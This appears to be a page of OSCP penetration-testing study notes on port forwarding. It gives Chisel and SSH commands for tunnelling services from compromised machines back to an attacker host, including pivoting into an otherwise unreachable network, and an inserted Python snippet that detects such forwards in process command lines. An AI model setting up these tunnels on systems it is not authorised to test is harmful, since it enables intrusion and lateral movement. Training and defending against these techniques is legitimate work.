OSCP 2022 Materials

Port Forwarding

Port forwarding is a technique where a service running on the target machine, or on any other machine on its network, is forwarded to the attacker's machine, where it can then be accessed locally.

Commonly used tools

  • Chisel

  • SSH

Local Port Forwarding

Local port forwarding is a technique to transfer a service running on the compromised machine to the attacker's machine.

Chisel

Attacker's Machine:

./chisel server -p 1337 --reverse

Compromised Machine:

# Forward the service on the compromised machine's port 5000 to the attacker machine's port 5000
./chisel client attackerip:1337 R:5000:127.0.0.1:5000

SSH

# The same with SSH
# Format: ssh -L attackermachineport:127.0.0.1:targetserviceport user@target
ssh -L 5000:127.0.0.1:5000 user@targetIP

Remote Port Forwarding

Remote port forwarding is a technique to transfer a service running on a machine that is present in the same network as the compromised machine to the attacker's machine.

Network Setup:

Machine A : Attacker's Machine

Machine B : Compromised Machine ( Has a network card to communicate with Y network )

Machine C : Machine on Y network

A ---> B ( Attacker can communicate with the Machine B )

B ---> C ( Machine B can communicate with both A and C with different network cards )

A --x-> C ( Attacker cannot communicate with the C since they are

Chisel

Attacker's Machine:

./chisel server -p 9001 --reverse

Compromised Machine ( Machine B ):

# Machine C has a service on its port 3000 which has to be forwarded to the attacker machine's port 3000
# Remote format: R:attackerlistenport:destinationhost:destinationport
./chisel client attackerip:9001 R:3000:machineCIP:3000

SSH

# The same can be performed with SSH
# Format: ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT [USER@]SSH_SERVER
# Run on Machine B: the SSH server is the attacker's machine, which then listens on port 3000
ssh -R 3000:machineCIP:3000 user@attackerip

Dynamic Port Forwarding

Dynamic port forwarding is a pivoting technique that gives the attacker full access to the services running on the compromised system through proxychains.
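
From the defending side, each of the forwards above is visible in the command line of the process that starts it. The following added example (not part of the original page) classifies ssh -L/-R/-D options and chisel client remotes found in process command lines; the sample command lines, addresses and the function name find_forwards are constructed for illustration.

```python
import shlex

# Constructed sample process command lines (illustrative, not from the page).
SAMPLE_CMDLINES = [
    "./chisel client 198.51.100.5:1337 R:5000:127.0.0.1:5000",
    "ssh -L 5000:127.0.0.1:5000 user@192.0.2.10",
    "ssh -N -R3000:192.0.2.20:3000 user@198.51.100.5",
    "ssh -D 1080 user@192.0.2.10",
    "ssh user@192.0.2.10 uptime",
    "/usr/bin/python3 server.py -L 80",
]

SSH_FLAGS = {"-L": "local", "-R": "remote", "-D": "dynamic"}


def find_forwards(cmdline):
    """Return (tool, kind, spec) for every forwarding spec in one command line."""
    argv = shlex.split(cmdline)
    if not argv:
        return []
    prog = argv[0].rsplit("/", 1)[-1]
    found = []
    if prog == "ssh":
        i = 1
        while i < len(argv):
            flag, attached = argv[i][:2], argv[i][2:]
            if flag in SSH_FLAGS:
                # The spec is either attached (-R3000:...) or the next argument.
                if attached:
                    spec = attached
                else:
                    i += 1
                    spec = argv[i] if i < len(argv) else ""
                found.append(("ssh", SSH_FLAGS[flag], spec))
            i += 1
    elif prog == "chisel" and "client" in argv[1:2]:
        # Assumption: no value-taking options; first positional is the server.
        positional = [a for a in argv[2:] if not a.startswith("-")]
        for spec in positional[1:]:
            kind = "reverse" if spec.startswith("R:") else "forward"
            found.append(("chisel", kind, spec))
    return found


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        for tool, kind, spec in find_forwards(line):
            print(f"{tool:7} {kind:8} {spec:28} <- {line}")
```

Matching on the program name alone misses renamed binaries, so this kind of check is best paired with network telemetry for unexpected listeners and long-lived outbound sessions.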

Last updated 2 years ago
